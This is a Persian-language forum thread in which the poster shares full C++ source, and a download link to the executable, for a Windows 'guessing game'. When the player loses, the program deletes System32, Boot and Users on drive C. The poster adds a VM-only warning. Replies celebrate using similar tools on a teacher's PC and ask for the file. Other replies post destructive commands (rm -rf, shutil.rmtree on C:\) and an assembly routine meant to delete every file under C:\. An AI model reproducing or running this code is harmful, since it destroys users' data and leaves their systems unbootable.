Slap ارسال شده در شنبه در 16:53 اشتراک گذاری ارسال شده در شنبه در 16:53 درود, قبل از توضیح, عرض کنم که: تحت هیچ عنوان! تکرار میکنم, هیچ عنوان! بر روی سیستم عامل اصلی خود این نرم افزار را اجرا نکنید. اگر قصد تست مهارت های خود را دارید از VM (Virtual Machine) استفاده کنید. یا بخش های خطرناک کد را تغییر دهید. این کد با زبان ++C نوشته شده است. و C++ Language Standard استفاده شده C++17 میباشد. خب خب خب, سلام به ستونای گلم بروبکس, یه چیزی براتون اماده کردم که, یعنی, ته تهدید و خطره, حالا برای شما یه خورده شلش کردم. چجوریه این نرم افزار؟ زمانی که نرم افزار به حالت اجرای خودش در میاد یک عدد شانسی بین 1 تا 100 جنریت میکنه و شما میبایستی زیر 30 ثانیه با حداکثر 3 تلاش بدون راهنمایی ان عدد را دریافت و وارد کنید. در صورتی که موفق نشدید به هر صورت 3 پوشه اصلی در Drive C مربوط به سیستم عاملتان تا جایی حذف خواهد شد. تا حد امکان بنده از چیز هایی که استفاده شده بود سعی کردم داخل سورس کد توضیح بدم بهتون به زبان ساده و گیرا سورس کد: #include <iostream> #include <cstdlib> #include <ctime> #include <windows.h> #include <filesystem> #include <thread> std::atomic<bool> TimerTamumShodeYaNa(!true); // DAMN BRO, EVERYWHERE IS CURSED void DelFolder(const std::string& folderPath) { try { std::filesystem::remove_all(folderPath); // Bakhshe jalebe majera } catch (const std::filesystem::filesystem_error& e) { std::cerr << "Shans ovordi be moshkel khordim: " << e.what() << std::endl; system("pause"); // Error khordim ke } } void StartTimer(int seconds) { std::this_thread::sleep_for(std::chrono::seconds(seconds)); // Chizi nist ye threade mamulie TimerTamumShodeYaNa = !false; } int main() { int BebinimCheMikone = MessageBoxA(NULL, "In bazi shukhi bardar nist\nMitune sadamate jeddi vared kone\nMotmaeni ke mikhay edame bedi?\nMan hich masooliyati dar ghebale asib nadaram.", "Hoshdar", MB_YESNO | MB_ICONQUESTION); if (BebinimCheMikone == IDYES) { MessageBoxA(NULL, "Harjur rahati...", "Khodet startesh kardi!", MB_OK | MB_ICONINFORMATION); } else if (BebinimCheMikone == IDNO) { MessageBoxA(NULL, "Boro va dige ham barnagard!\nHaddeaghal, na ta vaghti ke ghavi nashodi.", "Ay ay ay", MB_ICONWARNING); return 1; } SetConsoleTitleA("Boro ke dige gheydeto zadam, chon manam hala dige mesle to badam"); srand(time(0)); // Generate kardane seedi ke baes nashe adadi ke gen mikonim har seri yeki bashe int AdadeShansi = rand() % 100 + 1; // Generate e Yek adade shansi beyne 1 ta 100 const std::string System32 = "C:\\Windows\\System32"; const std::string Boot = "C:\\Windows\\Boot"; const std::string Users = "C:\\Users"; const int TedadeTalasha = 3; // Tedade Talash haye mojaz const int ChandSanie = 30; // Chand sanie vaght dare HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE); // Zadane Handle be Console (Jahate colorize) SetConsoleTextAttribute(hConsole, 2); // Rangi kardane texta be range sabz (ID: 2) std::cout << "Khodet in bazie kasifo shoru kardi! Too " << TedadeTalasha << " Talash karo dar biyar!" << std::endl; // Chap gar std::thread ThreadeTimereAsli(StartTimer, ChandSanie); // Threade starte timer baraye ChandSanie ThreadeTimereAsli.detach(); int TalashayeAlan = 0; // Chand ta talash karde bool DorostHadsZade = !true; // WTF? while (TalashayeAlan < TedadeTalasha && !TimerTamumShodeYaNa) { int ChioGofte = 0; // Fazayi ke chizi ke neveshte zakhire mishe (Meghdar dahie avvalie ba 0) SetConsoleTextAttribute(hConsole, 3); // Range abie nesbatan abi (ID: 3) std::cout << "Talashe chandome: " << (TalashayeAlan + 1) << " | Adad vared kon: "; std::cin >> ChioGofte; // Azash bekhad ke ye adad vared kone if (ChioGofte == AdadeShansi) { DorostHadsZade = !false; // Bro WTF is happening? (This sh** cursed...) break; } else { SetConsoleTextAttribute(hConsole, 4); // Ghermez (ID: 4) std::cout << "NA NA NA Eshtebah gofti, Dobare talash kon pesar" << std::endl; // Khit shod ke } TalashayeAlan++; } if (DorostHadsZade && !TimerTamumShodeYaNa) { MessageBoxA(NULL, "Man shekast khordam pesar!\nAfarin! To kareto khoob baladi!", "Dash Mehran dar mahfele Taha Neverlose", MB_ICONWARNING); // Karo gerefti ya na? (Taraf karesh doroste...) } else if (TimerTamumShodeYaNa) { DelFolder(System32); // Bye bye System32 DelFolder(Users); // Bye bye Usera DelFolder(Boot); // Bye bye pathe Boot MessageBoxA(NULL, "BAZI TAMUME (TIMET TAMUM SHOD!!)\nAZ PASESH BAR NAYUMADI!\nHALA MAN SYSTEMETO BE FANA DADAM!!!\nLEZZAT BEBAR GUGULIIIII", "Az tarafe Mehran va ahalie mahal", MB_ICONWARNING); } else { DelFolder(System32); // Bye bye System32 DelFolder(Users); // Bye bye Usera DelFolder(Boot); // Bye bye pathe Boot MessageBoxA(NULL, "BAZI TAMUME! AZ PASESH BAR NAYUMADI!\nHALA MAN SYSTEMETO BE FANA DADAM!!!\nLEZZAT BEBAR GUGULIIIII", "Az tarafe Mehran va ahalie mahal", MB_ICONWARNING); // R.I.P taraf: } return 0; } لینک فایل اجرایی: https://uploadkon.ir/uploads/f5c408_25HackMe.zip مجددا تکرار میکنم, به هیچ عنوان روی سیستم اصلی اجرا نکنید! هیچ مسئولیتی در قبال اجرای ان بر روی سیستم اصلی خود نخواهم داشت. اگر نظری, باگی, چیزی دیدید خوشحال میشم مطلع کنید. 1 نقل قول کی میتونست بره جلو بهتر از من؟ اینا که اسم بردی همه مثل... لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Mofa ارسال شده در شنبه در 16:56 اشتراک گذاری ارسال شده در شنبه در 16:56 (ویرایش شده) کاش حداقل سردرمیاوردم بفهمیم چجوریه ولی خب به هرحال عالی بود ویرایش شده شنبه در 16:57 توسط Mofa . 1 نقل قول Always Be YourSelf لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Destroyer ارسال شده در شنبه در 17:11 اشتراک گذاری ارسال شده در شنبه در 17:11 بهبه، نایس 1 نقل قول ɴᴜᴍʙᴇʀ ᴏɴᴇ ꜰᴀᴍɪʟʏ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
MedadRangi ارسال شده در شنبه در 17:21 اشتراک گذاری ارسال شده در شنبه در 17:21 مثل همیشه کار خودتو کردی نقل قول Since 2023 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iMaShruB ارسال شده در شنبه در 17:24 اشتراک گذاری ارسال شده در شنبه در 17:24 من که نفهمیدم این چیه ولی اها نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ramon ارسال شده در شنبه در 17:27 اشتراک گذاری ارسال شده در شنبه در 17:27 sudo rm -rf import shutil shutil.rmtree('C:\') نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Slap ارسال شده در شنبه در 17:32 سازنده اشتراک گذاری ارسال شده در شنبه در 17:32 4 دقیقه قبل، Ramon گفته است: sudo rm -rf import shutil shutil.rmtree('C:\') غمگین کننده است نقل قول کی میتونست بره جلو بهتر از من؟ اینا که اسم بردی همه مثل... لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ramon ارسال شده در شنبه در 17:33 اشتراک گذاری ارسال شده در شنبه در 17:33 هم اکنون، Slap گفته است: غمگین کننده است چرا نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Slap ارسال شده در شنبه در 17:34 سازنده اشتراک گذاری ارسال شده در شنبه در 17:34 هم اکنون، Ramon گفته است: چرا افسوس برای Drive C 1 نقل قول کی میتونست بره جلو بهتر از من؟ اینا که اسم بردی همه مثل... لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Suvastika ارسال شده در شنبه در 18:03 اشتراک گذاری ارسال شده در شنبه در 18:03 ی همچین چیزی با batch ساخته بودم داده بودم معلممون بنده خدا درایو cایش پر کشید نقل قول .ٖؒ﷽══════════════════════════════ .--ღஐƸ̵̡Ӝ̵̨̄Ʒஐღ--. یک روز ؋ـرا مے رسـב کـہ بـہ خاطر نکشتن هر یک یهوבے اورا نـ؋ـرین میکنیم.... .--ღஐƸ̵̡Ӝ̵̨̄Ʒஐღ--. (/_\) (•.•) 𝓝𝓾𝓶𝓫𝓮𝓻 𝓸𝓷𝓮 𝓯𝓪𝓶𝓲𝓵𝔂 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Integer ارسال شده در شنبه در 18:05 اشتراک گذاری ارسال شده در شنبه در 18:05 الحمدلله اینو میتونم تفسیر کنم کداشو :)) نقل قول MonsterS [M] :My Account :My Brothers لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
AnToinE ارسال شده در شنبه در 18:28 اشتراک گذاری ارسال شده در شنبه در 18:28 منی که سعی میکنم بخونمش: نقل قول به قول قاسمی نی کار شماها لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Slap ارسال شده در شنبه در 18:36 سازنده اشتراک گذاری ارسال شده در شنبه در 18:36 32 دقیقه قبل، Suvastika گفته است: ی همچین چیزی با batch ساخته بودم داده بودم معلممون بنده خدا درایو cایش پر کشید واکنش معلم: 29 دقیقه قبل، Integer گفته است: الحمدلله اینو میتونم تفسیر کنم کداشو :)) فکر کن کد اسمانیه, با صوت تفسیرش کن 7 دقیقه قبل، AnToinE گفته است: منی که سعی میکنم بخونمش: پیشنهاد میدم از Text Editor استفاده کنی اگه چشمات رو دوست داری. نقل قول کی میتونست بره جلو بهتر از من؟ اینا که اسم بردی همه مثل... لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Ramon ارسال شده در شنبه در 18:47 اشتراک گذاری ارسال شده در شنبه در 18:47 نیاز به تست داره section .data path db 'C:\*.*', 0 section .text extern DeleteFileA, FindFirstFileA, FindNextFileA, FindClose global _start _start: ; Find the first file in the directory push path call FindFirstFileA test eax, eax jz _done _delete_file: ; Delete the file push path call DeleteFileA test eax, eax jz _done ; Find the next file call FindNextFileA test eax, eax jnz _delete_file _done: ; Close the find handle call FindClose ; Exit the program mov eax, 1 xor ebx, ebx int 0x80 کسی هست تست کنه (assembly) تازه شروع به یاد گیریش کردم زیاد بلد نیستم نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iArsalan ارسال شده در شنبه در 19:14 اشتراک گذاری ارسال شده در شنبه در 19:14 عالی، نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
samcoder ارسال شده در دوشنبه در 06:45 اشتراک گذاری ارسال شده در دوشنبه در 06:45 اسکوید گیم واقعی اینه دست خوش 1 نقل قول زنده ایم قسطی تو ایران لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Destroyer ارسال شده در دوشنبه در 09:06 اشتراک گذاری ارسال شده در دوشنبه در 09:06 در ۱۴۰۳/۱۱/۲۰ در 21:33، Suvastika گفته است: ی همچین چیزی با batch ساخته بودم داده بودم معلممون بنده خدا درایو cایش پر کشید فایلشو بفرس برا من داش امیر نقل قول ɴᴜᴍʙᴇʀ ᴏɴᴇ ꜰᴀᴍɪʟʏ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Olden ارسال شده در 7 ساعت قبل اشتراک گذاری ارسال شده در 7 ساعت قبل داشم مهران عالی، درجه یک و خطرناک ولی فکر نکنم ویندوزای الان اجازه دیلیت شدن پوشه های اصلی رو بدن نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Tommy ارسال شده در 7 ساعت قبل اشتراک گذاری ارسال شده در 7 ساعت قبل نقل قول Tommy .Maahdi. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Slap ارسال شده در 5 ساعت قبل سازنده اشتراک گذاری ارسال شده در 5 ساعت قبل 2 ساعت قبل، Olden گفته است: داشم مهران عالی، درجه یک و خطرناک ولی فکر نکنم ویندوزای الان اجازه دیلیت شدن پوشه های اصلی رو بدن در صورتی که به برنامه ی کامپایل شده دسترسی های بالا داده بشه, امکانش هست. نقل قول کی میتونست بره جلو بهتر از من؟ اینا که اسم بردی همه مثل... لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ارسالهای توصیه شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید.
توجه: strong> مطلب ارسالی شما پس از تایید مدیریت برای همه قابل رویت خواهد بود.